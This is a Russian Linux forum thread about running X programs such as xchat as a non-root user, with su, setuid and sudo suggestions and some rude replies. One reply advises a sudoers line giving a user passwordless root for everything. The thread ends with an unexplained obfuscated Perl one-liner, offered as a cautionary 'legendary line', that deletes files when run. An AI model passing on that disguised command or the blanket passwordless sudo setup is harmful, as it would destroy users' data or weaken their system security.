LINUX.ORG.RU

Как запустить в иксах программу не из под root, если иксы грузились из-под root?


0

0

Как запустить в иксах программу не из под root, если иксы грузились из-под root? Если наоборот, то потятно - su. А если я хочу запустить xchat, который очень не хочет, чтобы его запускали под root'ом, то как сделать так, чтобы он запускался с полномочиями другого пользователя?

su - UserName -c xchat
UserName -- имя юзера (не рут)

sdio ★★★★★
()

>Как запустить в иксах программу не из под root, если иксы грузились из-под root?

застрелицца не пробовал? таким как ты, обычно помогает

geek ★★★
()

Насчет застрелится дельный совет дали. Под рутом НЕЛЬЗЯ работать. Если неверишь, то подними тему про легендарную строчку на перле...

Orlangoor ★★★★★
()

а нехуй работать под рутом

tws
()

Можно с помощью chown задать исполняемому файлу непревелигированного владельца и с помощью chmod выставить флаг запуска с правами владельца. Тогда независимо от того, под каким пользователем Вы работаете, приложение всегда пудет запускаться под пользователем-владельцем.

AVI
()
Ответ на: комментарий от AVI

>Можно с помощью chown задать исполняемому файлу непревелигированного владельца и с помощью chmod выставить флаг запуска с правами владельца. Тогда независимо от того, под каким пользователем Вы работаете, приложение всегда пудет запускаться под пользователем-владельцем.

Правда, при этом что похабно: если рухнет прога (или ее взломают), то может накрыться в т.ч. ее исполняемый файл. Но это конечно окологипотетическая ситуация.

А вообще, народ правильно шумит-гудит насчет сидения под рутом. Если совсем никуда от рута не деться, то можно root-консоль прицепить, ну и sudo конечно рулит.

BTW, хочу чтобы сетевые приложения рабтали из-под (псевдо-)юзера mozilla. Как это сделать?

На ум конечно приходит

$ alias browse 'sudo -u mozilla $BROWSER'

, только я его (sudo) конфигурить не умею Ю))

man {vi}sudo не помогает -- сложнее написан, чем статья про парадокс Банаха-Тарского в цикипедии. Может, у кого есть туториал?

Пойду в гугле поищу...

lodin ★★★★
()
Ответ на: комментарий от lodin

поначалу (пока ещё паранойя не беспокоит :) ), проще:

visudo:

root ALL=(ALL) NOPASSWD: ALL uzver ALL=(ALL) NOPASSWD: ALL

и работаем с sudo ...

anonymous
()
Ответ на: комментарий от Chemist

Вообще нельзя сидеть. Как я уже говорил подними пост про строчку на перле. Довольно поучительная история.

Orlangoor ★★★★★
()
Ответ на: комментарий от Orlangoor

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Demetrio ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.